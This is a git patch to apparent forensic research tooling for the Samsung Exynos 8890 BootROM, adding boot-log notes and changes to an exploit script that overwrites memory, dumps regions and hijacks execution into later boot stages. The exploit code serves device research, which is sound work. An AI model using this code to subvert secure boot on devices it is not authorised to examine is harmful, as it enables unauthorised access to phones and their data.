From 72a50cd648f7428932ca68e795bd0fc0e180c19e Mon Sep 17 00:00:00 2001
From: Jonathan Herrewijnen <j.herrewijnen@nfi.nl>
Date: Sat, 7 Dec 2024 20:58:35 +0100
Subject: [PATCH] docs update and boot flow update

---
 .../source/BootROM_8890/05_notes.rst          | 15 ++++++++++++++
 source/exploit/exploit.py                     | 20 ++++++++++++++++++-
 2 files changed, 34 insertions(+), 1 deletion(-)

diff --git a/documentation/source/BootROM_8890/05_notes.rst b/documentation/source/BootROM_8890/05_notes.rst
index a76e455..bc59655 100644
--- a/documentation/source/BootROM_8890/05_notes.rst
+++ b/documentation/source/BootROM_8890/05_notes.rst
@@ -291,4 +291,19 @@ If jumping into the boot BL33 function twice, the LDFW returns -. at the second
         [ERROR] Fail to load Secure payload
         => Return value : -.
 
+When continuing the boot flow by jumping into cf0052f8 after recovery boot
 
+.. code:: bash
+
+    U-Boot 2012.07-gc7c41ec14-dirty (Oct 23 2019 - 12:53:04) for SADK8890
+
+    CPU: Exynos8890 Rev2.0 [Samsung SOC on SMP Platform Base on ARM CortexA53]
+    MNGS_PLL = 1975MHz      APOLLO_PLL = 1481MHz    MIF_PLL = 1539MHz
+    BUS0_PLL = 1056MHz      BUS1_PLL = 800MHz       BUS2_PLL = 672MHz       BUS3_PLL = 1872MHz
+    MFC_PLL = 71MHz AUD_PLL = 494MHz        G3D_PLL = 650MHz        DISP_PLL = 63MHz
+
+    Board: SADK8890
+    DRAM:  6 GiB
+    ECT: PARA006o
+
+I dumped the contents of 0xcf4dfb28 to 60, which is a boot path information setter. Something in BL33 is setting this, because it is still empty (0xFF) after booting into BL2 and waiting for BL33.
diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py
index 79809d3..495cc0e 100644
--- a/source/exploit/exploit.py
+++ b/source/exploit/exploit.py
@@ -793,6 +793,10 @@ class ExynosDevice():
         #if args.MIB3:
         #    self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
 
+        if args.MIB3:
+            self.cd.memwrite_region(0x020553e4, b"\x1f\x50\x00\x71")
+            self.cd.memwrite_region(0x020553f8, b"\x1f\x50\x00\x71")
+
         self.cd.restore_stack_and_jump(hijacked_fun) # Jumps to function that waits for next boot stage
 
         # ==== Stage 4 BL2 ====
@@ -844,6 +848,10 @@ class ExynosDevice():
             # Modifying return values to continue boot flow
             #self.cd.memwrite_region(0xcf05dea8, b"\xa0\x1f\x42\xf8")
 
+        # Print boot info from cf4dfb28
+        print(self.cd.memdump_region(0xcf4dfb28, 0x32))
+
+        # Start boot from BL33
         self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
         self.cd.restore_stack_and_jump(BL33_AUTH)
 
@@ -852,7 +860,17 @@ class ExynosDevice():
 
         self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
 
-        self.write_uart(DEBUGGER_ADDR, 0xcf4dfb28)th
+        self.cd.arch_dbg.state.X0 = 0x0
+        self.cd.restore_stack_and_jump(0xcf05dd00)
+        self.connect_device()
+        self.usb_read(0x200)
+
+        # Print something over uart
+        self.write_uart(DEBUGGER_ADDR, 0xcf4dfb58)
+
+        # Try to continue the bootflow
+        self.cd.restore_stack_and_jump(0xcf0052f8)
+
 
         # NOT WORKING
         self.read_ufs(DEBUGGER_ADDR)